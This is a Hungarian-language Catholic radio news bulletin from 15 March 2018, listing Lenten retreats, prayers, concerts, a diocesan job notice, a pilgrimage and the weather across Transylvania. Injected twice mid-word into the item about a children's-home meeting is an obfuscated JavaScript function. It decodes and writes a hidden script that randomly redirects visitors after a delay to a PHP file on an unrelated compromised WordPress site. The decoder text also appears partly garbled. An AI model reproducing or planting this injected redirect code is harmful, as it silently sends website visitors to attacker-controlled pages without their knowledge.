2018. március 15. – Hírek és programajánló

H Í R E K   D É L B E N

Ökumenikus ima a szabadságharc hőseiért
Ma délután öt órakor a város keresztény felekezetei közösen imádkoznak a nemzeti egységért, az egységes nemzetért a Szent László király pártfogása alatt álló nagyvárad-újvárosi római katolikus templomban. Az ökumenikus rendezvényen részt vesz Böcskei László megyés püspök is.

Családok keresztútja Csíkszeredában
A Búzamag közösség szervezésében ma délután fél hat órától keresztúti ájtatosság lesz a családokért a Szent József kápolnában. Hívják a családokat és a híveket a közös imára.

Nagyböjti lelkigyakorlatok egyházmegyékszerte
Ma este hat órától nagyböjti triduum kezdődik a csíktaplocai Mindenszentek-plébániatemplomban. A húsvétra való felkészülést Urbán Erik ferences atya vezeti. A lelkigyakorlatos elmélkedések témái: az Oltáriszentség, a szentmise és a Oltáriszentségben jelenlévő Jézussal való találkozásból fakadó küldetés.
Március 16-18. között lelkigyakorlat lesz a székelyvarsági egyházközségben is, Pantea Tibor ferences atya vezetésével.
Nagyböjti lelkigyakorlat lesz ugyancsak március 16-18 között Biharpüspökiben. A szentmisék holnap és szombaton délután hat órakor, vasárnap pedig délelőtt tíz órakor kezdődnek. Az elmélkedéseket Vakon Zsolt püspöki titkár tartja.
A kolozsvári Szent Mihály-plébániatemplomban március 19-21. között nagyböjti lelkigyakorlat lesz. A délután hat órakor kezdődő szentmisék keretében Illyés Zsolt csíkszentléleki plébános tartja az elmélkedéseket.

Bibliás est Gyergyószentmiklóson
A Katolikus Magyar Bibliatársulat szervezésében március 16-án, holnap este hat órától a gyergyószentmiklósi örmény katolikus közösségi házban nagyböjti bibliás est lesz. Várják a gyerekeket és a felnőtteket egyaránt.

Gyermekotthonok találkozója Nagyváradon
Március 17-én, szombaton a Nagyváradi Római Katolikus Egyetemi Lelkészség szervezésében tartják a Bihar megyében működő magyar nyelvű gyermekotthonok képviselőinek találkozóját, melynek helyszíne a Nagyváradi Római Katolikus Püspökség Lelkipásztori Központja (Nagyvárad, Kanonok Sor 13.) A találkozó délután két órakor, a Székesegyházban tartfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó lelki programmal ér majd véget, amire szeretettel várnak minden érdeklődőt.

Ünnep a piarista nővéreknél
Rendalapítójukat, Boldog Celestina Donátit ünneplik Nagykárolyban a piarista nővérek. Március 18-án, vasárnap délután hat órától a Kalazanci Szent József-templomban hálaadó szentmisét mutat be Schönberger Jenő szatmári megyés püspök. A szentbeszédet Böszörményi Géza piarista tartja. A szentmise keretében fogadalomújításra is sor kerül.

Álláshírdetés az érsekségen
A Gyulafehérvári Római Katolikus Érsekség pályázatot hirdet gazdasági intéző, valamint székesegyházi idegenvezető munkakörök betöltésére. Elvárások a gazdasági intéző munkakörben szőlészeti-borászati szakismeret. Feladatkör: az érsekségi gazdaság vezetése, nevezetesen a szőlő és más mezőgazdasági munkálatok megszervezése, valamint borászati szakfelügyelet. Az idegenvezetői munkakör esetében előnyt jelent több idegennyelv ismerete. Mindkét esetben szolgálati lakás vagy a Gyulafehérvár környéki helységekből az ingázási költség biztosított. Érdeklődni Kedves Imre gazdasági igazgatónál a 0740-223.828 telefonszámon lehet. Szakmai önéletrajzokat a pk@romkat.ro címre lehet beküldeni.

Nagyböjti orgonaest
A Bach in the Subways nemzetközi program keretében 2010 óta minden év márciusában, Johann Sebastian Bach születésnapja környékén világszerte kiváló muzsikusok ünneplik a zeneszerzőt ingyenes koncerteket adva nyilvános helyeken. Idén első alkalommal Nagyvárad is kapcsolódik ehez a programhoz. Március 23-án, pénteken este hat órától Szeghalmi Emese tart orgonakoncertet a nagyváradi evangélikus templomban. Várnak minden zenekedvelőt.

Jótékonysági koncert lesz Szatmárnémetiben
Mága Zoltán Prima Primissima díjas magyar zenész, hegedűművész rövidesen jótékonysági koncertet ad Szatmárnémetiben. Az alkalomra nem kell belépőjegyet váltani, ám adományozni lehet. Az összegyűlt pénz egy részét a szatmári Gyöngyszem Egyesület a közösség egy elismert és szeretett hölgytagjának gyógyíttatására használja fel, míg a másik részét a Szatmári Egyházmegyei Caritas Szervezet által fenntartott Szent József Rehabilitációs Központ kapja. Ott atipikusan fejlődő, fejlődési zavarral vagy fogyatékósággal elő, 0–7 evés korú gyerekeknek segítenek.
A Prima Primissima díjas magyar zenész jótékonysági koncertje március 25-én, virágvasárnap lesz a németi templomban délután 5 órától.

Zarándoklat Medjugorjéba
Az erdélyi Mária Rádió zarándoklatot szervez Medjugorjéba június 10-16 között nagyváradi indulással. A zarándoklatot Karácson Tibor, rádiónk műsorigazgatója vezeti. Várják elsősorban a Nagyvárad, Szatmár, Arad, Temesvár környéki hívek jelentkezését a 0743-782461 telefonszámon.

Időjárás: A mai nap folyamán is több helyen előfordulhat eső, zápor. Ismét feltámad a szél. Délután 6-14 fok közötti hőmérséklet várható. Az Erdélyi medence térségében lesz hűvösebb.

MRE - Hírszolgálat, 2018. március 15.


H Í R E K   R E G G E L

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán Korondon tartják az örökös szentségimádási napot. Nagyböjt folyamán járuljunk gyakrabban az Oltáriszentségben jelen levő Krisztus elé, engeszteljük Őt bűneinkért és engedjük, hogy jelenléte formáljon, megtisztítson bennünket.

Ökumenikus ima a szabadságharc hőseiért
Ma délután öt órakor a város keresztény felekezetei közösen imádkoznak a nemzeti egységért, az egységes nemzetért a Szent László király pártfogása alatt álló nagyvárad-újvárosi római katolikus templomban. Az ökumenikus rendezvényen részt vesz Böcskei László megyés püspök is.

Családok keresztútja Csíkszeredában
A Búzamag közösség szervezésében ma délután fél hat órától keresztúti ájtatosság lesz a családokért a Szent József kápolnában. Hívják a családokat és a híveket a közös imára.

Nagyböjti lelkigyakorlatok egyházmegyékszerte
Ma este hat órától nagyböjti triduum kezdődik a csíktaplocai Mindenszentek-plébániatemplomban. A húsvétra való felkészülést Urbán Erik ferences atya vezeti. A lelkigyakorlatos elmélkedések témái: az Oltáriszentség, a szentmise és a Oltáriszentségben jelenlévő Jézussal való találkozásból fakadó küldetés.
Március 16-18. között lelkigyakorlat lesz a székelyvarsági egyházközségben is, Pantea Tibor ferences atya vezetésével.
Nagyböjti lelkigyakorlat lesz ugyancsak március 16-18 között Biharpüspökiben. A szentmisék holnap és szombaton délután hat órakor, vasárnap pedig délelőtt tíz órakor kezdődnek. Az elmélkedéseket Vakon Zsolt püspöki titkár tartja.
A kolozsvári Szent Mihály-plébániatemplomban március 19-21. között nagyböjti lelkigyakorlat lesz. A délután hat órakor kezdődő szentmisék keretében Illyés Zsolt csíkszentléleki plébános tartja az elmélkedéseket.

Sanctus Stephanus – Kárpát-medencei versmondó verseny
Államalapító Szent István királyunk emlékének tiszteletére a magyarországi Mária Rádió versmondó versenyt hirdet magyarországi és határon túli magyar középiskolás (főgimnázium, szakgimnázium, szakközépiskola), valamint szakiskolás diákok számára. A verseny fő védnöke Dr. Erdő Péter bíboros, Magyarország prímása. A versenyre egy Szent Istvánról szóló, az államalapító király történelmi jelentőségét bemutató és egy szabadon választott verssel lehet nevezni a sanctus.stephanus@mariaradio.hu címen egészen holnapig. Egyébb részletek a www.mariaradio.hu oldalán találhatnak.

Bibliás est Gyergyószentmiklóson
A Katolikus Magyar Bibliatársulat szervezésében március 16-án, holnap este hat órától a gyergyószentmiklósi örmény katolikus közösségi házban nagyböjti bibliás est lesz. Várják a gyerekeket és a felnőtteket egyaránt.

Egyházmegyei családos találkozó Temesváron
Március 17-én, szombaton a temesvár-józsefvárosi plébánia hittantermében 9.30 és 18.00 óra között a marosvásárhelyi Mărgulescu házaspár előadást tart természetes családtervezés témában. Részvételi díj 130 lej családonként.

Gyermekotthonok találkozója Nagyváradon
Március 17-én, szombaton a Nagyváradi Római Katolikus Egyetemi Lelkészség szervezésében tartják a Bihar megyében működő magyar nyelvű gyermekotthonok képviselőinek találkozóját, melynek helyszíne a Nagyváradi Római Katolikus Püspökség Lelkipásztori Központja (Nagyvárad, Kanonok Sor 13.) A találkozó délután két órakor, a Székesegyházban tartfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó lelki programmal ér majd véget, amire szeretettel várnak minden érdeklődőt.

Ünnep a piarista nővéreknél
Rendalapítójukat, Boldog Celestina Donátit ünneplik Nagykárolyban a piarista nővérek. Március 18-án, vasárnap délután hat órától a Kalazanci Szent József-templomban hálaadó szentmisét mutat be Schönberger Jenő szatmári megyés püspök. A szentbeszédet Böszörményi Géza piarista tartja. A szentmise keretében fogadalomújításra is sor kerül.

Álláshírdetés az érsekségen
A Gyulafehérvári Római Katolikus Érsekség pályázatot hirdet gazdasági intéző, valamint székesegyházi idegenvezető munkakörök betöltésére. Elvárások a gazdasági intéző munkakörben szőlészeti-borászati szakismeret. Feladatkör: az érsekségi gazdaság vezetése, nevezetesen a szőlő és más mezőgazdasági munkálatok megszervezése, valamint borászati szakfelügyelet. Az idegenvezetői munkakör esetében előnyt jelent több idegennyelv ismerete. Mindkét esetben szolgálati lakás vagy a Gyulafehérvár környéki helységekből az ingázási költség biztosított. Érdeklődni Kedves Imre gazdasági igazgatónál a 0740-223.828 telefonszámon lehet. Szakmai önéletrajzokat a pk@romkat.ro címre lehet beküldeni.

Időjárás: A mai nap folyamán is több helyen előfordulhat eső, zápor. Délen és a középső országrészben akár az ég is megdörrenhet. Ismét feltámad a szél. Hajnalban -4, +4, délután 6-14 fok várható. Az Erdélyi medence térségében lesz hűvösebb.

MRE - Hírszolgálat, 2018. március 15.

About the author

maradmin

Leave a Comment